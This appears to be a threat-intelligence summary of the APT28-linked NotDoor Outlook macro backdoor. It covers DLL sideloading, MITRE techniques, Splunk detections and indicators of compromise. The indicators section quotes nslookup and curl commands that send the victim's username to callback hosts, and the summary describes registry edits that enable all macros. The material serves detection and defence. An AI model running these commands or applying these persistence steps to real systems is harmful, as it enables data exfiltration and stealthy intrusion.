NotDoor is an Outlook VBA macro backdoor tied to APT28 that uses OneDrive DLL sideloading, encoded PowerShell, and registry modifications to persist, monitor incoming emails for C2 triggers, exfiltrate data, and execute commands. The Splunk Threat Research Team provides detection guidance and Splunk analytic content for identifying indicators like SSPICLI.dll and VbaProject.OTM manipulation. #NotDoor #APT28
Keypoints
- NotDoor is an Outlook macro backdoor first reported by Lab52 and attributed to APT28 (Fancy Bear) that uses VBA macros in VbaProject.OTM as a C2 channel.
- Attackers stage four files under C:ProgramData: OneDrive.exe (legitimate), malicious SSPICLI.dll (sideloaded), tmp7E9C.dll (renamed original), and testtemp.ini (VBA macro payload).
- OneDrive DLL sideloading (T1574.001) loads the malicious SSPICLI.dll, which references tmp7EC9.dll to avoid crashes and enables payload execution.
- The malicious DLL runs base64-encoded PowerShell commands (T1027.010) to perform network checks, send username via DNS/webhook, and copy testtemp.ini into the Outlook VBA file location.
- Outlook macros (T1137.005) are used to monitor incoming emails for triggers, execute code paths, exfiltrate data via email, and run on startup/new mail events.
- Registry modifications (T1112) change LoadMacroProviderOnBoot, Outlook Security Level (set to enable all macros), and PONT_STRING to suppress warning dialogs and ensure stealthy persistence.
- Splunk analytic detections include monitoring for encoded PowerShell execution, Outlook registry key modifications, disabled Outlook dialogs by unusual processes, and creation/modification of VbaProject.OTM by non-Outlook processes.
MITRE Techniques
- [T1574.001 ] OneDrive DLL Sideloading – The attacker placed a malicious SSPICLI.dll alongside OneDrive.exe so the legitimate OneDrive executable loads the malicious DLL. Quote: ‘the legitimate OneDrive.exe executable is vulnerable to loading SSPICLI.dll.’
- [T1027.010 ] Encoded PowerShell – The malicious DLL executes base64-encoded PowerShell commands to perform network checks and copy the macro payload into AppData. Quote: ‘A couple of them are various network checks… The important one is the command to copy testtemp.ini to a specific directory in AppData.’
- [T1137.005 ] Outlook Macro – The VBA macro stored in %APPDATA%MicrosoftOutlookVbaProject.otm monitors incoming emails for triggers, executes code on startup/new mail, and acts as a C2/exfiltration channel. Quote: ‘This particular malicious macro acts as a C2 channel. The malware uses several Outlook functions (Application_MAPILogonComplete and Application_NewMailEx) to run code on Outlook startup or when new emails arrive.’
- [T1112 ] Modify Registry – The malicious DLL modifies Outlook-related registry keys including LoadMacroProviderOnBoot, the Outlook Security Level, and PONT_STRING to enable macros and suppress dialogs. Quote: ‘One of these is the LoadMacroProviderOnBoot key… In this case we can see that the value is being set to 1 so that all macros are enabled… The value that NotDoor is creating specifically blocks content download warnings.’
Indicators of Compromise
- [File] Staged and malicious filenames – SSPICLI.dll (malicious sideloaded DLL), tmp7E9C.dll (renamed legit copy), testtemp.ini (VBA macro payload)
- [File Hash] Malicious file hashes – SSPICLI.dll: 5a88a15a1d764e635462f78a0cd958b17e6d22c716740febc114a408eef66705; testtemp.ini: 8f4bca3c62268fff0458322d111a511e0bcfba255d5ab78c45973bd293379901
- [File Path] Persistence and macro storage – VbaProject.OTM creation in %APPDATA%RoamingMicrosoftOutlookVbaProject.OTM (copied from C:ProgramDatatesttemp.ini)
- [Registry] Modified Outlook registry keys – LoadMacroProviderOnBoot set to 1, Outlook Security Level (Level) set to 1, and PONT_STRING modified to suppress dialogs
- [Network] Webhook/DNS callback patterns – nslookup and curl to webhook/dnshook domains (e.g., nslookup “$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook.site”, curl “http://webhook.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME”)